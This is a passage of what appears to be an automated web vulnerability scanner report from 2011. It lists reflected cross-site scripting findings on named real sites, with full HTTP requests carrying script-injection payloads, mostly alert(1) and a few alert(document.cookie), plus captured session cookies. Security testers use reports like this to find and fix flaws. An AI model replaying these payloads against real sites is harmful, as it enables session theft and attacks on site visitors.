HTTP/1.1 200 OK Server: nginx/0.7.68 Date: Mon, 28 Feb 2011 13:31:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Length: 64397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <a href='mailto:webmaster@csdn.net?subject=Article%20Report!!!&body=Author:jiji262%0D%0AURL:http://blog.csdn.net/ArticleContent.aspx?UserName=jiji262&Entryid=1713771&a20f3'style='x:expression(alert(1))'86f4c83a4c1=1'> ...[SNIP]...
3.20. http://bossip.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bossip.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf6c9"><script>alert(1)</script>bda78cec728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf6c9\"><script>alert(1)</script>bda78cec728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bf6c9"><script>alert(1)</script>bda78cec728=1 HTTP/1.1 Host: bossip.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 28 Feb 2011 13:30:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://bossip.com/xmlrpc.php Link: <http://wp.me/2nLn>; rel=shortlink Content-Length: 140862
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="http://bossip.com/?bf6c9\"><script>alert(1)</script>bda78cec728=1"> ...[SNIP]...
The value of the partnerId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89b64'%3balert(1)//24e01503e82 was submitted in the partnerId parameter. This input was echoed as 89b64';alert(1)//24e01503e82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /collector/tag.js?partnerId=oversee89b64'%3balert(1)//24e01503e82&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Fwww.acelacomm.com%2F&q=high%20speed%20internet%20service HTTP/1.1 Host: c.chango.com Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:11 GMT Content-Type: text/javascript Connection: close Server: TornadoServer/1.1 Etag: "02737ea2ad027a16d88bd0e6bb8ba3eae7372d65" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _t=075059e6-433e-11e0-ba97-00259009a9c2; Domain=chango.com; expires=Thu, 25 Feb 2021 13:24:11 GMT; Path=/ Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 29 May 2011 13:24:11 GMT; Path=/ Content-Length: 1338
The value of the referrerURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f965"%3balert(1)//ecfa71f1fd7 was submitted in the referrerURL parameter. This input was echoed as 9f965";alert(1)//ecfa71f1fd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /collector/tag.js?partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Fwww.acelacomm.com%2F9f965"%3balert(1)//ecfa71f1fd7&q=high%20speed%20internet%20service HTTP/1.1 Host: c.chango.com Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:11 GMT Content-Type: text/javascript Connection: close Server: TornadoServer/1.1 Etag: "2ae9421c0e5e0da0633b3f40a667e6338fe37628" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _t=07644afa-433e-11e0-8a56-00259031f86c; Domain=chango.com; expires=Thu, 25 Feb 2021 13:24:11 GMT; Path=/ Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 29 May 2011 13:24:11 GMT; Path=/ Content-Length: 1338
3.23. http://comments.csoonline.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a674"><script>alert(1)</script>d5c3c02a50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?4a674"><script>alert(1)</script>d5c3c02a50=1 HTTP/1.1 Host: comments.csoonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096;
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:32:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:32:26 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44039
3.24. http://comments.csoonline.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf5d2"-alert(1)-"6df848beb70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bf5d2"-alert(1)-"6df848beb70=1 HTTP/1.1 Host: comments.csoonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096;
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:32:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:32:28 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43843
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 849b1"%3b189334f2a1f was submitted in the REST URL parameter 1. This input was echoed as 849b1";189334f2a1f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /files849b1"%3b189334f2a1f/csocomments_favicon.ico HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:30 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33613
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9bd8"><script>alert(1)</script>cbf29c1b127 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c9bd8"><script>alert(1)</script>cbf29c1b127/csocomments_favicon.ico HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:30 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33673
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fac"><script>alert(1)</script>dc54f79142d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files/14fac"><script>alert(1)</script>dc54f79142d HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:33 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:33 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33619
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 333b8"%3b26136881516 was submitted in the REST URL parameter 2. This input was echoed as 333b8";26136881516 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /files/csocomments_favicon.ico333b8"%3b26136881516 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:33 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33613
3.29. http://comments.csoonline.com/files/csocomments_favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/files/csocomments_favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78001"-alert(1)-"3356cf7e2ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files/csocomments_favicon.ico?78001"-alert(1)-"3356cf7e2ee=1 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:27 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:27 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33652
3.30. http://comments.csoonline.com/files/csocomments_favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/files/csocomments_favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c374d"><script>alert(1)</script>283a11c7a62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files/csocomments_favicon.ico?c374d"><script>alert(1)</script>283a11c7a62=1 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:24 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33697
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c781b"><script>alert(1)</script>e7daab9589f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c781b"><script>alert(1)</script>e7daab9589f/global/logo-techwords.gif HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:21 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33679
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1be02"%3bcbdd094398f was submitted in the REST URL parameter 1. This input was echoed as 1be02";cbdd094398f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /images1be02"%3bcbdd094398f/global/logo-techwords.gif HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:22 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33622
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1359c"%3bbed5f7e89d2 was submitted in the REST URL parameter 2. This input was echoed as 1359c";bed5f7e89d2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /images/global1359c"%3bbed5f7e89d2/logo-techwords.gif HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:27 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:27 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33622
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a54a"><script>alert(1)</script>917b628f55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/8a54a"><script>alert(1)</script>917b628f55/logo-techwords.gif HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:27 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33676
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4221"><script>alert(1)</script>aa87fe73910 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/global/f4221"><script>alert(1)</script>aa87fe73910 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:32 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33643
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 409e8"%3b37e874acee2 was submitted in the REST URL parameter 3. This input was echoed as 409e8";37e874acee2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
